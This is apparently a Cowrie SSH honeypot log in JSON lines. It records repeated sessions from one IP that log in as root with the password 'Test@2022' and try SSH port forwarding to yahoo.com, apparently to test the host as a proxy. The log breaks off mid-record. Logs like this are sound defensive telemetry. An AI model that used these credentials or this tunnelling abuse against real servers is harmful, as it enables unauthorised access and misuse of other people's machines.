{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.217403Z","src_ip":"213.209.150.239","session":"a39899882b66"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.499971Z","src_ip":"213.209.150.239","session":"a39899882b66"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":11164,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:11164","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.558060Z","session":"a39899882b66"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.614977Z","src_ip":"213.209.150.239","session":"a39899882b66"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":18460,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:18460","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.771334Z","session":"a39899882b66"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.827927Z","src_ip":"213.209.150.239","session":"a39899882b66"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.885435Z","src_ip":"213.209.150.239","session":"a39899882b66"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40461,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7c21d5b3f43","protocol":"ssh","message":"New connection: 213.209.150.239:40461 (1.2.3.4:22) [session: b7c21d5b3f43]","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.931694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.932640Z","src_ip":"213.209.150.239","session":"b7c21d5b3f43"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:12.979993Z","src_ip":"213.209.150.239","session":"b7c21d5b3f43"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:13.215242Z","src_ip":"213.209.150.239","session":"b7c21d5b3f43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":8271,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8271","sensor":"my-vps","timestamp":"2025-08-26T01:06:13.263071Z","session":"b7c21d5b3f43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:13.310435Z","src_ip":"213.209.150.239","session":"b7c21d5b3f43"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":29742,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:29742","sensor":"my-vps","timestamp":"2025-08-26T01:06:13.445670Z","session":"b7c21d5b3f43"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:13.492849Z","src_ip":"213.209.150.239","session":"b7c21d5b3f43"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:13.540672Z","src_ip":"213.209.150.239","session":"b7c21d5b3f43"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40521,"dst_ip":"1.2.3.4","dst_port":22,"session":"87882bd3920c","protocol":"ssh","message":"New connection: 213.209.150.239:40521 (1.2.3.4:22) [session: 87882bd3920c]","sensor":"my-vps","timestamp":"2025-08-26T01:06:13.596330Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:13.597252Z","src_ip":"213.209.150.239","session":"87882bd3920c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:13.653994Z","src_ip":"213.209.150.239","session":"87882bd3920c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:13.936458Z","src_ip":"213.209.150.239","session":"87882bd3920c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":14877,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:14877","sensor":"my-vps","timestamp":"2025-08-26T01:06:13.994108Z","session":"87882bd3920c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:14.050984Z","src_ip":"213.209.150.239","session":"87882bd3920c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":10247,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10247","sensor":"my-vps","timestamp":"2025-08-26T01:06:14.207013Z","session":"87882bd3920c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:14.263683Z","src_ip":"213.209.150.239","session":"87882bd3920c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:14.321814Z","src_ip":"213.209.150.239","session":"87882bd3920c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40633,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e8d3bdd2ba3","protocol":"ssh","message":"New connection: 213.209.150.239:40633 (1.2.3.4:22) [session: 7e8d3bdd2ba3]","sensor":"my-vps","timestamp":"2025-08-26T01:06:14.377672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:14.378814Z","src_ip":"213.209.150.239","session":"7e8d3bdd2ba3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:14.435481Z","src_ip":"213.209.150.239","session":"7e8d3bdd2ba3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:14.718724Z","src_ip":"213.209.150.239","session":"7e8d3bdd2ba3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":12811,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:12811","sensor":"my-vps","timestamp":"2025-08-26T01:06:14.776292Z","session":"7e8d3bdd2ba3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:14.833084Z","src_ip":"213.209.150.239","session":"7e8d3bdd2ba3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":5086,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:5086","sensor":"my-vps","timestamp":"2025-08-26T01:06:14.987070Z","session":"7e8d3bdd2ba3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.044559Z","src_ip":"213.209.150.239","session":"7e8d3bdd2ba3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.102275Z","src_ip":"213.209.150.239","session":"7e8d3bdd2ba3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40689,"dst_ip":"1.2.3.4","dst_port":22,"session":"d12a39f02b53","protocol":"ssh","message":"New connection: 213.209.150.239:40689 (1.2.3.4:22) [session: d12a39f02b53]","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.157881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.167651Z","src_ip":"213.209.150.239","session":"d12a39f02b53"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.214899Z","src_ip":"213.209.150.239","session":"d12a39f02b53"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.497064Z","src_ip":"213.209.150.239","session":"d12a39f02b53"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":25117,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:25117","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.554584Z","session":"d12a39f02b53"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.611902Z","src_ip":"213.209.150.239","session":"d12a39f02b53"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":19216,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19216","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.767096Z","session":"d12a39f02b53"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.823959Z","src_ip":"213.209.150.239","session":"d12a39f02b53"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.881804Z","src_ip":"213.209.150.239","session":"d12a39f02b53"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":40755,"dst_ip":"1.2.3.4","dst_port":22,"session":"82a2a5241dbf","protocol":"ssh","message":"New connection: 213.209.150.239:40755 (1.2.3.4:22) [session: 82a2a5241dbf]","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.937441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:15.938216Z","src_ip":"213.209.150.239","session":"82a2a5241dbf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 